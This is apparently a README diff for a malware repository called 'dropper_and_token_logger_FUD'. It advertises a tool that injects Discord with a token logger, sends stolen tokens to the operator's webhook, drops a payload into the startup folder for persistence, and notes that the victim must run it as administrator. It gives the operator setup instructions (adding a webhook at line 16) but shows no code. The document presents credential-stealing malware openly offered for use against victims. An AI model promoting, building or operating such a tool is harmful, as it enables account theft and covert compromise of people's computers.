GreenShadowLegend/dropper_and_token_logger_FUD/README.md

 # Dropper and token logger FUD
 ### info:
 Injects discord with a token logger sent to your webhook and drops your payload and places it in the startup folder.
+After compiling, the victim needs to run it as administrator.
 ## How to use:

 Add your webhook at line 16